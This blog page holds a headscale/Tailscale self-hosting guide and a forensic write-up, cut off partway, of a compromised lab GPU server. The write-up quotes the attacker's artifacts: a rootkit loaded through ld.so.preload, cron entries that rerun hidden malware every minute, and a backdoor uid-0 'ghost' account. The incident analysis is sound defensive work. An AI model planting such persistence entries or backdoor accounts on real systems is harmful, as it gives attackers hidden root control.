libreliu's blog

Tailscale 服务部署快速参考 2025-02-26

2025/02/28: 修复了笔误，感谢 @taoky。

Tailscale 介绍

来源于 Kimi.ai，K1.5 Long thinking

Tailscale 是一种网状 VPN 服务，它简化了不同网络中设备和服务之间的安全连接。以下是关于它的一些关键点：

基本概念和工作原理
- 网状网络架构：与传统的使用中央网关的 VPN 不同，Tailscale 创建了一个点对点的网状网络（称为 tailnet）。网络中的每个设备都可以直接与其他设备通信，从而降低了延迟并提高了吞吐量。
- WireGuard 协议：它利用开源的 WireGuard 协议进行加密的点对点连接。该协议以其安全性和性能著称，提供了端到端的加密和零信任架构。
优势
- 高性能：去中心化的架构避免了单点故障和瓶颈，即使网络规模扩大，也能确保稳定可靠的连接。
- 安全性和隐私性：基于现代技术和最佳实践构建，Tailscale 提供了强大的安全功能，如访问控制策略和 tailnet 锁定。它还符合各种安全标准。
- 易于使用：Tailscale 高度可配置，但设置起来非常简单。用户无需深厚的网络知识即可在几分钟内部署一个 tailnet。“零配置”方法允许在防火墙和 NAT 之后无缝连接，无需复杂的配置。

服务端部署

其实 Tailscale 可以采用官方的服务器，不过也可以使用开源的 headscale 实现，自己搭建登录服务器。

这里选择采用

headscale v0.23.0 作为登录服务器
headscale-ui
Caddy 作为反向代理，把 UI 和 headscale 本身需要提供的网关功能搓到一起，同时自动获取 SSL 证书来处理 https

采用 Docker Compose v3 来简单编排容器。

具体可以参考后面的“附录：全量服务端配置”。

配置文件和其余命令约定如下：

your.example.com 是用来 host Tailscale 的你的域名，其应该有正确配置的 A 和 AAAA 记录。
your_email@example.com 是你的邮箱。
intra.example.com 是 MagicDNS 前缀，Tailscale 网络内的客户端在连接到 Tailscale 网络后，可以通过 主机名.intra.example.com 解析到彼此的网内 IP 地址。这里推荐采用自己域名的子域名，这样以避免和互联网上的可能域名冲突。

在按全量服务端配置配置后，需要生成 api key 用于 Headscale UI 的 Web 访问。

可以考虑用下面的命令生成 Key：

1 2	# 3650d 代表该 apikey 将在 3650 天后过期 docker exec -it headscale headscale apikeys create -e 3650d

记录该 Key，并填入 Headscale UI，就可以通过浏览器管理客户端设备和用户的访问权限等。

客户端连接

Windows

在 Tailscale 官方网站下载客户端，安装后，打开 cmd，输入

1	tailscale login --login-server http://your.example.com/

后，点击下图的托盘提示，跳转到 Headscale 的提示页面

然后打开 Headscale UI 的 Device 页面（例如，https://your.example.com/web/devices.html）增加 User 后增加相应 Device 即可。

Linux

可以参考 Tailscale 官方网站的说明，例如 Ubuntu 22.04 的相关配置。

只需要注意，在 tailscale login 时，同时指定 --login-server 参数即可。

附录：全量服务端配置

your.example.com 是用来 host Tailscale 的你的域名，其应该有正确配置的 A 和 AAAA 记录。
your_email@example.com 是你的邮箱。
intra.example.com 是 MagicDNS 前缀，Tailscale 网络内的客户端在连接到 Tailscale 网络后，可以通过 主机名.intra.example.com 解析到彼此的网内 IP 地址。这里推荐采用自己域名的子域名，这样以避免和互联网上的可能域名冲突。

`./docker-compose.yaml`

这里最后会暴露 80，443 两个端口。

version: "3.7"

services:
  headscale:
    image: headscale/headscale:v0.23.0
    restart: unless-stopped
    container_name: headscale
    ports: # 80 is to be forwarded by caddy, and hence not exposed
           # only need to expose others locally
      - "127.0.0.1:9090:9090"  # /metrics
      - "127.0.0.1:50443:50443"  # grpc api
    volumes:
      - /home/libreliu/headscale/config:/etc/headscale
      - headscale_data:/var/lib/headscale
    command: serve
    networks:
      - hs-net

  headscale-ui:
    image: ghcr.io/gurucomputing/headscale-ui:latest
    restart: unless-stopped
    container_name: headscale-ui
    expose:
      - "8443"
      - "8080"
    networks:
      - hs-net

  caddy:
    image: caddy:latest
    container_name: caddy
    restart: unless-stopped
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./Caddyfile:/etc/caddy/Caddyfile
      - caddy_data:/data
      - caddy_config:/config
    networks:
      - hs-net

networks:
  hs-net:
    driver: bridge

volumes:
  caddy_data:
  caddy_config:
  headscale_data:

`./Caddyfile`

{
    email your_email@example.com  # Provide a valid email for ACME notifications.
    admin off  # Disable Caddy's admin API if not needed.
}

# Route for Headscale UI
your.example.com {
    reverse_proxy /web* http://headscale-ui:8080
    reverse_proxy * http://headscale:80
}

`./config/config.yaml`

---
# headscale will look for a configuration file named `config.yaml` (or `config.json`) in the following order:
#
# - `/etc/headscale`
# - `~/.headscale`
# - current working directory

# The url clients will connect to.
# Typically this will be a domain like:
#
# https://myheadscale.example.com:443
#
server_url: https://your.example.com:443

# Address to listen to / bind to on the server
#
# For production:
listen_addr: 0.0.0.0:80
#listen_addr: 127.0.0.1:8080

# Address to listen to /metrics, you may want
# to keep this endpoint private to your internal
# network
#
#metrics_listen_addr: 127.0.0.1:9090
metrics_listen_addr: 0.0.0.0:9090

# Address to listen for gRPC.
# gRPC is used for controlling a headscale server
# remotely with the CLI
# Note: Remote access _only_ works if you have
# valid certificates.
#
# For production:
#grpc_listen_addr: 0.0.0.0:50443
grpc_listen_addr: 127.0.0.1:50443

# Allow the gRPC admin interface to run in INSECURE
# mode. This is not recommended as the traffic will
# be unencrypted. Only enable if you know what you
# are doing.
grpc_allow_insecure: false

# The Noise section includes specific configuration for the
# TS2021 Noise protocol
noise:
  # The Noise private key is used to encrypt the
  # traffic between headscale and Tailscale clients when
  # using the new Noise-based protocol.
  private_key_path: /var/lib/headscale/noise_private.key

# List of IP prefixes to allocate tailaddresses from.
# Each prefix consists of either an IPv4 or IPv6 address,
# and the associated prefix length, delimited by a slash.
# It must be within IP ranges supported by the Tailscale
# client - i.e., subnets of 100.64.0.0/10 and fd7a:115c:a1e0::/48.
# See below:
# IPv6: https://github.com/tailscale/tailscale/blob/22ebb25e833264f58d7c3f534a8b166894a89536/net/tsaddr/tsaddr.go#LL81C52-L81C71
# IPv4: https://github.com/tailscale/tailscale/blob/22ebb25e833264f58d7c3f534a8b166894a89536/net/tsaddr/tsaddr.go#L33
# Any other range is NOT supported, and it will cause unexpected issues.
prefixes:
  v6: fd7a:115c:a1e0::/48
  v4: 100.64.0.0/10

  # Strategy used for allocation of IPs to nodes, available options:
  # - sequential (default): assigns the next free IP from the previous given IP.
  # - random: assigns the next free IP from a pseudo-random IP generator (crypto/rand).
  allocation: sequential

# DERP is a relay system that Tailscale uses when a direct
# connection cannot be established.
# https://tailscale.com/blog/how-tailscale-works/#encrypted-tcp-relays-derp
#
# headscale needs a list of DERP servers that can be presented
# to the clients.
derp:
  server:
    # If enabled, runs the embedded DERP server and merges it into the rest of the DERP config
    # The Headscale server_url defined above MUST be using https, DERP requires TLS to be in place
    enabled: false

    # Region ID to use for the embedded DERP server.
    # The local DERP prevails if the region ID collides with other region ID coming from
    # the regular DERP config.
    region_id: 999

    # Region code and name are displayed in the Tailscale UI to identify a DERP region
    region_code: "headscale"
    region_name: "Headscale Embedded DERP"

    # Listens over UDP at the configured address for STUN connections - to help with NAT traversal.
    # When the embedded DERP server is enabled stun_listen_addr MUST be defined.
    #
    # For more details on how this works, check this great article: https://tailscale.com/blog/how-tailscale-works/
    stun_listen_addr: "0.0.0.0:3478"

    # Private key used to encrypt the traffic between headscale DERP
    # and Tailscale clients.
    # The private key file will be autogenerated if it's missing.
    #
    private_key_path: /var/lib/headscale/derp_server_private.key

    # This flag can be used, so the DERP map entry for the embedded DERP server is not written automatically,
    # it enables the creation of your very own DERP map entry using a locally available file with the parameter DERP.paths
    # If you enable the DERP server and set this to false, it is required to add the DERP server to the DERP map using DERP.paths
    automatically_add_embedded_derp_region: true

    # For better connection stability (especially when using an Exit-Node and DNS is not working),
    # it is possible to optionally add the public IPv4 and IPv6 address to the Derp-Map using:
    ipv4: 1.2.3.4
    ipv6: 2001:db8::1

  # List of externally available DERP maps encoded in JSON
  urls:
    - https://controlplane.tailscale.com/derpmap/default

  # Locally available DERP map files encoded in YAML
  #
  # This option is mostly interesting for people hosting
  # their own DERP servers:
  # https://tailscale.com/kb/1118/custom-derp-servers/
  #
  # paths:
  #   - /etc/headscale/derp-example.yaml
  paths: []

  # If enabled, a worker will be set up to periodically
  # refresh the given sources and update the derpmap
  # will be set up.
  auto_update_enabled: true

  # How often should we check for DERP updates?
  update_frequency: 24h

# Disables the automatic check for headscale updates on startup
disable_check_updates: false

# Time before an inactive ephemeral node is deleted?
ephemeral_node_inactivity_timeout: 30m

database:
  # Database type. Available options: sqlite, postgres
  # Please note that using Postgres is highly discouraged as it is only supported for legacy reasons.
  # All new development, testing and optimisations are done with SQLite in mind.
  type: sqlite

  # Enable debug mode. This setting requires the log.level to be set to "debug" or "trace".
  debug: false

  # GORM configuration settings.
  gorm:
    # Enable prepared statements.
    prepare_stmt: true

    # Enable parameterized queries.
    parameterized_queries: true

    # Skip logging "record not found" errors.
    skip_err_record_not_found: true

    # Threshold for slow queries in milliseconds.
    slow_threshold: 1000

  # SQLite config
  sqlite:
    path: /var/lib/headscale/db.sqlite

    # Enable WAL mode for SQLite. This is recommended for production environments.
    # https://www.sqlite.org/wal.html
    write_ahead_log: true

  # # Postgres config
  # Please note that using Postgres is highly discouraged as it is only supported for legacy reasons.
  # See database.type for more information.
  # postgres:
  #   # If using a Unix socket to connect to Postgres, set the socket path in the 'host' field and leave 'port' blank.
  #   host: localhost
  #   port: 5432
  #   name: headscale
  #   user: foo
  #   pass: bar
  #   max_open_conns: 10
  #   max_idle_conns: 10
  #   conn_max_idle_time_secs: 3600

  #   # If other 'sslmode' is required instead of 'require(true)' and 'disabled(false)', set the 'sslmode' you need
  #   # in the 'ssl' field. Refers to https://www.postgresql.org/docs/current/libpq-ssl.html Table 34.1.
  #   ssl: false

### TLS configuration
#
## Let's encrypt / ACME
#
# headscale supports automatically requesting and setting up
# TLS for a domain with Let's Encrypt.
#
# URL to ACME directory
acme_url: https://acme-v02.api.letsencrypt.org/directory

# Email to register with ACME provider
acme_email: ""

# Domain name to request a TLS certificate for:
tls_letsencrypt_hostname: ""

# Path to store certificates and metadata needed by
# letsencrypt
# For production:
tls_letsencrypt_cache_dir: /var/lib/headscale/cache

# Type of ACME challenge to use, currently supported types:
# HTTP-01 or TLS-ALPN-01
# See [docs/tls.md](docs/tls.md) for more information
tls_letsencrypt_challenge_type: HTTP-01
# When HTTP-01 challenge is chosen, letsencrypt must set up a
# verification endpoint, and it will be listening on:
# :http = port 80
tls_letsencrypt_listen: ":http"

## Use already defined certificates:
tls_cert_path: ""
tls_key_path: ""

log:
  # Output formatting for logs: text or json
  format: text
  level: info

## Policy
# headscale supports Tailscale's ACL policies.
# Please have a look to their KB to better
# understand the concepts: https://tailscale.com/kb/1018/acls/
policy:
  # The mode can be "file" or "database" that defines
  # where the ACL policies are stored and read from.
  mode: file
  # If the mode is set to "file", the path to a
  # HuJSON file containing ACL policies.
  path: ""

## DNS
#
# headscale supports Tailscale's DNS configuration and MagicDNS.
# Please have a look to their KB to better understand the concepts:
#
# - https://tailscale.com/kb/1054/dns/
# - https://tailscale.com/kb/1081/magicdns/
# - https://tailscale.com/blog/2021-09-private-dns-with-magicdns/
#
# Please note that for the DNS configuration to have any effect,
# clients must have the `--accept-dns=true` option enabled. This is the
# default for the Tailscale client. This option is enabled by default
# in the Tailscale client.
#
# Setting _any_ of the configuration and `--accept-dns=true` on the
# clients will integrate with the DNS manager on the client or
# overwrite /etc/resolv.conf.
# https://tailscale.com/kb/1235/resolv-conf
#
# If you want stop Headscale from managing the DNS configuration
# all the fields under `dns` should be set to empty values.
dns:
  # Whether to use [MagicDNS](https://tailscale.com/kb/1081/magicdns/).
  # Only works if there is at least a nameserver defined.
  magic_dns: true

  # Defines the base domain to create the hostnames for MagicDNS.
  # This domain _must_ be different from the server_url domain.
  # `base_domain` must be a FQDN, without the trailing dot.
  # The FQDN of the hosts will be
  # `hostname.base_domain` (e.g., _myhost.example.com_).
  base_domain: intra.example.com

  # List of DNS servers to expose to clients.
  nameservers:
    global:
      - 1.1.1.1
      - 1.0.0.1
      - 2606:4700:4700::1111
      - 2606:4700:4700::1001

      # NextDNS (see https://tailscale.com/kb/1218/nextdns/).
      # "abc123" is example NextDNS ID, replace with yours.
      # - https://dns.nextdns.io/abc123

    # Split DNS (see https://tailscale.com/kb/1054/dns/),
    # a map of domains and which DNS server to use for each.
    split:
      {}
      # foo.bar.com:
      #   - 1.1.1.1
      # darp.headscale.net:
      #   - 1.1.1.1
      #   - 8.8.8.8

  # Set custom DNS search domains. With MagicDNS enabled,
  # your tailnet base_domain is always the first search domain.
  search_domains: []

  # Extra DNS records
  # so far only A-records are supported (on the tailscale side)
  # See https://github.com/juanfont/headscale/blob/main/docs/dns-records.md#Limitations
  extra_records: []
  #   - name: "grafana.myvpn.example.com"
  #     type: "A"
  #     value: "100.64.0.3"
  #
  #   # you can also put it in one line
  #   - { name: "prometheus.myvpn.example.com", type: "A", value: "100.64.0.3" }

  # DEPRECATED
  # Use the username as part of the DNS name for nodes, with this option enabled:
  # node1.username.example.com
  # while when this is disabled:
  # node1.example.com
  # This is a legacy option as Headscale has have this wrongly implemented
  # while in upstream Tailscale, the username is not included.
  use_username_in_magic_dns: false

# Unix socket used for the CLI to connect without authentication
# Note: for production you will want to set this to something like:
unix_socket: /var/run/headscale/headscale.sock
unix_socket_permission: "0770"
#
# headscale supports experimental OpenID connect support,
# it is still being tested and might have some bugs, please
# help us test it.
# OpenID Connect
# oidc:
#   only_start_if_oidc_is_available: true
#   issuer: "https://your-oidc.issuer.com/path"
#   client_id: "your-oidc-client-id"
#   client_secret: "your-oidc-client-secret"
#   # Alternatively, set `client_secret_path` to read the secret from the file.
#   # It resolves environment variables, making integration to systemd's
#   # `LoadCredential` straightforward:
#   client_secret_path: "${CREDENTIALS_DIRECTORY}/oidc_client_secret"
#   # client_secret and client_secret_path are mutually exclusive.
#
#   # The amount of time from a node is authenticated with OpenID until it
#   # expires and needs to reauthenticate.
#   # Setting the value to "0" will mean no expiry.
#   expiry: 180d
#
#   # Use the expiry from the token received from OpenID when the user logged
#   # in, this will typically lead to frequent need to reauthenticate and should
#   # only been enabled if you know what you are doing.
#   # Note: enabling this will cause `oidc.expiry` to be ignored.
#   use_expiry_from_token: false
#
#   # Customize the scopes used in the OIDC flow, defaults to "openid", "profile" and "email" and add custom query
#   # parameters to the Authorize Endpoint request. Scopes default to "openid", "profile" and "email".
#
#   scope: ["openid", "profile", "email", "custom"]
#   extra_params:
#     domain_hint: example.com
#
#   # List allowed principal domains and/or users. If an authenticated user's domain is not in this list, the
#   # authentication request will be rejected.
#
#   allowed_domains:
#     - example.com
#   # Note: Groups from keycloak have a leading '/'
#   allowed_groups:
#     - /headscale
#   allowed_users:
#     - alice@example.com
#
#   # If `strip_email_domain` is set to `true`, the domain part of the username email address will be removed.
#   # This will transform `first-name.last-name@example.com` to the user `first-name.last-name`
#   # If `strip_email_domain` is set to `false` the domain part will NOT be removed resulting to the following
#   user: `first-name.last-name.example.com`
#
#   strip_email_domain: true

# Logtail configuration
# Logtail is Tailscales logging and auditing infrastructure, it allows the control panel
# to instruct tailscale nodes to log their activity to a remote server.
logtail:
  # Enable logtail for this headscales clients.
  # As there is currently no support for overriding the log server in headscale, this is
  # disabled by default. Enabling this will make your clients send logs to Tailscale Inc.
  enabled: false

# Enabling this option makes devices prefer a random port for WireGuard traffic over the
# default static port 41641. This option is intended as a workaround for some buggy
# firewall devices. See https://tailscale.com/kb/1181/firewalls/ for more information.
randomize_client_port: true

炼丹炉被黑始末 (a.k.a. 这下服务器变回转寿司了，最美味的一集) 2024-02-28

炼丹炉被黑了，以下是事情经过：

流水账

2024/2/27：师兄发现在实验室服务器上登陆的网络通被网络信息中心留言：

您好！

您使用的IP地址 xxx.xxx.xx.xxx 存在通信异常行为，
请尽快对系统进行处理，否则网络信息中心中心将暂停该机的对外通信。

科大网络信息中心 (联系方式略)

异常行为：
xxx.xxx.xx.xx大量查询域名ircx.us.too,怀疑该IP已被入侵并被远程控制。

留言共有两条：分别为 2024/2/21 20:44 和 2024/2/27 09:31 所留，均提示高频的 IRC 服务器域名 DNS 查询。

我简单用 tcpdump -i lo port 53 看了一下，发现了一秒钟多次的 DNS 查询。因为使用了 systemd-resolved，DNS 服务器为 systemd 的 127.0.0.53，故可以在本地回环链路上观察到。

经过观察，主要有到 ircx.us.to, irc.dal.net, irc.undernet.org 三个域名的查询，每秒查询超过 100 次。

显然，服务器应该是被黑了。

2024/2/28：在 @taoky 的帮助下进行了比较详尽的调查，花费了一个晚上。

情况介绍

该服务器位于科大校园网内，以 100Mbps 以太网链路接入管科楼，拥有学校的 IPv4 和 IPv6 地址，没有专门的网络通，需要上网时同学会登陆自己的网络通账号。

服务器为 Ubuntu 20.04 LTS，插有 10 (9?) 块 RTX3090 显卡。平常同学们通过 ssh 公钥登陆，或通过 (密码 + TOTP Code) 进行登陆（采用 libpam-google-authenticator，参考 link）。

服务器共有 25 个用户，其中 5 个拥有 sudo 权限，3 个位于 docker 组。Docker daemon 运行在 root。

利用 netstat -nlp 可以看到上面有 pgyvpn，ZeroTier 等程序。

分析过程

大概的分析时间线如下：

确定哪个进程在发出 DNS 请求

$ sudo netstat -np | grep 127.0.0.53:53 | grep udp
udp        0      0 127.0.0.1:41511         127.0.0.53:53           ESTABLISHED -                   
udp      768      0 127.0.0.1:43814         127.0.0.53:53           ESTABLISHED 5973/./nobody       
udp        0      0 127.0.0.1:44384         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.1:46012         127.0.0.53:53           ESTABLISHED 1989649/[           
udp      768      0 127.0.0.1:52710         127.0.0.53:53           ESTABLISHED 5975/./nobody       
udp        0      0 127.0.0.1:55295         127.0.0.53:53           ESTABLISHED 1989647/[           
udp      768      0 127.0.0.1:55728         127.0.0.53:53           ESTABLISHED 5976/./nobody       
udp        0      0 127.0.0.1:55801         127.0.0.53:53           ESTABLISHED 1986059/[kwor       
udp        0      0 127.0.0.1:56095         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.1:57082         127.0.0.53:53           ESTABLISHED 2178005/[           
udp        0      0 127.0.0.1:58772         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.1:59061         127.0.0.53:53           ESTABLISHED 1995387/[           
udp        0      0 127.0.0.1:59165         127.0.0.53:53           ESTABLISHED 1986012/[           
udp        0      0 127.0.0.1:60684         127.0.0.53:53           ESTABLISHED -

可以看到怀疑对象有 PID 为 5976 和 1989649 等几个进程。

不过，登登登登：

1 2	$ sudo ps aux \| grep 5975 lzt 40314 0.0 0.0 19764 2856 pts/11 S+ 22:41 0:00 grep --color=auto 5975

这要拜 Rootkit 所赐，因为 /etc/ld.so.preload 里面加入了一些内容。不过也没事，可以用静态链接的 busybox 来看：

$ sudo ./busybox cat /etc/ld.so.preload
/usr/local/lib/dbus-collector/libdbus_x86_64.so
/usr/local/lib/network.so
$ sudo ./busybox ps aux | grep 5975
 5975 zx        5:43 ./nobody nmop
44054 lzt       0:00 grep --color=auto 5975
$ sudo ./busybox readlink -f /proc/5975/exe
/home/zx/.cpan/nobody

仔细检查，共有下面的用户拥有 .cpan：

1
2
3

/home/spf/.cpan
/home/xy/.cpan
/home/zx/.cpan

另外观察一下另外几个进程：

$ sudo ./busybox readlink -f /proc/1986059/exe
/usr/bin/crond
$ sudo ./busybox readlink -f /proc/1989647/exe
/usr/bin/a
# 下同

cron 日志暴露的内容

另外，在 journalctl 的 cron 条目里面可以额外发现一些信息：

太长了，点这里观看

2月 28 22:53:01 GPU crontab[62015]: (yyy) LIST (yyy)
2月 28 22:54:01 GPU crontab[63492]: (yyy) LIST (yyy)
2月 28 22:55:01 GPU CRON[65423]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:55:01 GPU CRON[65424]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:55:01 GPU CRON[65427]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:55:01 GPU CRON[65426]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:55:01 GPU CRON[65425]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:55:01 GPU CRON[65428]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:55:01 GPU CRON[65429]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:55:01 GPU CRON[65430]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:55:01 GPU CRON[65423]: pam_unix(cron:session): session closed for user root
2月 28 22:55:01 GPU CRON[65424]: pam_unix(cron:session): session closed for user root
2月 28 22:55:01 GPU crontab[65438]: (yyy) LIST (yyy)
2月 28 22:55:01 GPU CRON[65425]: pam_unix(cron:session): session closed for user xy
2月 28 22:55:01 GPU CRON[65426]: (CRON) info (No MTA installed, discarding output)
2月 28 22:55:01 GPU CRON[65426]: pam_unix(cron:session): session closed for user yyy
2月 28 22:56:01 GPU CRON[67335]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:56:01 GPU CRON[67338]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:56:01 GPU CRON[67334]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:56:01 GPU CRON[67339]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:56:01 GPU CRON[67336]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:56:01 GPU CRON[67337]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:56:01 GPU CRON[67340]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:56:01 GPU CRON[67342]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:56:01 GPU CRON[67334]: pam_unix(cron:session): session closed for user root
2月 28 22:56:01 GPU CRON[67335]: pam_unix(cron:session): session closed for user root
2月 28 22:56:01 GPU CRON[67336]: pam_unix(cron:session): session closed for user xy
2月 28 22:56:01 GPU crontab[67351]: (yyy) LIST (yyy)
2月 28 22:56:01 GPU CRON[67337]: (CRON) info (No MTA installed, discarding output)
2月 28 22:56:01 GPU CRON[67337]: pam_unix(cron:session): session closed for user yyy
2月 28 22:57:01 GPU CRON[69563]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:57:01 GPU CRON[69561]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:57:01 GPU CRON[69564]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:57:01 GPU CRON[69562]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:57:01 GPU CRON[69560]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:57:01 GPU CRON[69565]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:57:01 GPU CRON[69566]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:57:01 GPU CRON[69567]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:57:01 GPU CRON[69562]: pam_unix(cron:session): session closed for user xy
2月 28 22:57:01 GPU CRON[69560]: pam_unix(cron:session): session closed for user root
2月 28 22:57:01 GPU CRON[69561]: pam_unix(cron:session): session closed for user root
2月 28 22:57:01 GPU CRON[69563]: (CRON) info (No MTA installed, discarding output)
2月 28 22:57:01 GPU CRON[69563]: pam_unix(cron:session): session closed for user yyy
2月 28 22:58:01 GPU CRON[70918]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:58:01 GPU CRON[70917]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:58:01 GPU CRON[70919]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:58:01 GPU CRON[70920]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:58:01 GPU CRON[70921]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:58:01 GPU CRON[70923]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:58:01 GPU CRON[70922]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:58:01 GPU CRON[70924]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:58:01 GPU CRON[70919]: pam_unix(cron:session): session closed for user xy
2月 28 22:58:01 GPU CRON[70918]: pam_unix(cron:session): session closed for user root

这里可以额外看到

1
2
3

/dev/shm/.m-1013/dbus-collector.seed
/root/.cpan/.cache/update
/.dbus/auto

三个脚本。

用户账户的信息

可以看到被篡改的 passwd 和 group；木马甚至贴心的留了 passwd- 和 group- 作为备份…

$ diff /etc/passwd /etc/passwd-
78d77
< ghost:x:0:0::/:/bin/bash
$ diff /etc/group /etc/group-
1c1
< root:x:0:
---
> root:x:0:bin
21c21
< sudo:x:27:omnisky,chz,lzt,gjf,hy,nobody,bin
---
> sudo:x:27:omnisky,chz,lzt,gjf,hy,nobody

lastlog 中提供了一些登陆信息。其中 ghost (a.k.a. root) 账户于 2 月 26 日被另一科大 IP 地址的主机登陆。由网络信息中心的相关老师查询得知上面登陆着其它 lab 的网络通。

ghost pts/2 xxx.xxx.xxx.xx 一 2月 26 02:42:02 +0800 2024

与 root 时间相同。

日志和文件修改时间

syslog 已经被 rotate, auth.log 被 rotate 或者被入侵程序删除了。

auth 里面可以发现 1 月 28 号就有 crontab 活动了：

太长了，点这里观看

Jan 28 00:00:01 GPU CRON[524365]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan 28 00:00:01 GPU CRON[524366]: pam_unix(cron:session): session opened for user xy by (uid=0)
Jan 28 00:00:01 GPU CRON[524367]: pam_unix(cron:session): session opened for user zx by (uid=0)
Jan 28 00:00:01 GPU CRON[524368]: pam_unix(cron:session): session opened for user zx by (uid=0)
Jan 28 00:00:01 GPU CRON[524369]: pam_unix(cron:session): session opened for user spf by (uid=0)
Jan 28 00:00:01 GPU CRON[524365]: pam_unix(cron:session): session closed for user root
Jan 28 00:00:01 GPU CRON[524366]: pam_unix(cron:session): session closed for user xy
Jan 28 00:00:01 GPU CRON[524367]: pam_unix(cron:session): session closed for user zx
Jan 28 00:00:01 GPU CRON[524368]: pam_unix(cron:session): session closed for user zx
Jan 28 00:00:01 GPU CRON[524369]: pam_unix(cron:session): session closed for user spf

其他异常文件

根目录多了很多花里胡哨的东西。

太长了，点这里观看

$ ./busybox ls -alh /
total 13M    
drwxr-xr-x   26 root     root        4.0K Feb 28 11:22 .
drwxr-xr-x   26 root     root        4.0K Feb 28 11:22 ..
drwxr-xr-x    3 10000    jyx         4.0K Feb 25 17:28 .dbus
lrwxrwxrwx    1 root     root           7 Jan 10  2023 bin -> usr/bin
drwxr-xr-x    4 root     root        4.0K Dec  1  2019 boot
drwxr-xr-x    2 root     root        4.0K Dec  1  2019 cdrom
drwxr-xr-x   11 root     root        4.0K Dec  1  2019 data
drwxr-xr-x   24 root     root        4.0K Dec  1  2019 data1
drwxr-xr-x    4 root     root        4.0K Dec  1  2019 data2
drwxr-xr-x   19 root     root        5.6K Dec  1  2019 dev
drwxr-xr-x  149 root     root       12.0K Feb 28 23:44 etc
-rw-r--r--    1 root     root        8.6M Feb 25 17:03 good
drwxr-xr-x   31 root     root        4.0K Feb 28 10:21 home
-rwxr-xr-x    1 root     root       61.4K Dec  1  2019 kwk
lrwxrwxrwx    1 root     root           7 Jan 10  2023 lib -> usr/lib
lrwxrwxrwx    1 root     root           9 Jan 10  2023 lib32 -> usr/lib32
lrwxrwxrwx    1 root     root           9 Jan 10  2023 lib64 -> usr/lib64
lrwxrwxrwx    1 root     root          10 Jan 10  2023 libx32 -> usr/libx32
drwx------    2 root     root       16.0K Dec  1  2019 lost+found
drwxr-xr-x    3 root     root        4.0K Dec  1  2019 media
drwxr-xr-x    2 root     root        4.0K Dec  1  2019 mnt
-rwxr-xr-x    1 root     root        4.0M Dec  1  2019 mx
drwxr-xr-x   24 root     root        4.0K Dec  1  2019 old_os
drwxr-xr-x    7 root     root        4.0K Dec  1  2019 opt
dr-xr-xr-x 1422 root     root           0 Dec  1  2019 proc
drwx------   12 root     root        4.0K Feb 28 23:44 root
drwxr-xr-x   39 root     root        1.3K Feb 29 00:29 run
lrwxrwxrwx    1 root     root           8 Jan 10  2023 sbin -> usr/sbin
drwxr-xr-x   11 root     root        4.0K Dec  1  2019 snap
drwxr-xr-x    2 root     root        4.0K Dec  1  2019 srv
dr-xr-xr-x   13 root     root           0 Dec  1  2019 sys
drwxrwxrwt  647 root     root      148.0K Feb 29 00:30 tmp
drwxr-xr-x   14 root     root        4.0K Dec  1  2019 usr
drwxr-xr-x   16 root     root        4.0K Dec  1  2019 var
drwxrwxr-x    2 root     root        4.0K Feb 28 11:26 x

多了 /x，/mx 和 /kwk，/good，/.dbus。

crontab 分析

太长了，点这里观看

$ sudo ls -alh /var/spool/cron/crontabs/
total 28K
drwx-wx--T 2 root crontab 4.0K 2月  26 13:57 .
drwxr-xr-x 3 root root    4.0K 8月  31  2022 ..
-rw------- 1 root crontab  291 2月  25 17:28 root
-rw------- 1 spf  crontab  277 2月  17  2023 spf
-rw------- 1 xy   crontab  233 2月  17  2023 xy
-rw------- 1 yyy  crontab  261 2月  26 13:57 yyy
-rw------- 1 zx   crontab  343 2月  20  2023 zx
$ sudo cat /var/spool/cron/crontabs/yyy
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Feb 26 13:57:19 2024)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# DO NOT REMOVE THIS LINE. dbus-kernel
* * * * * /dev/shm/.m-1013/dbus-collector.seed
$ sudo cat /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.ZblArV/crontab installed on Sun Feb 25 17:28:18 2024)
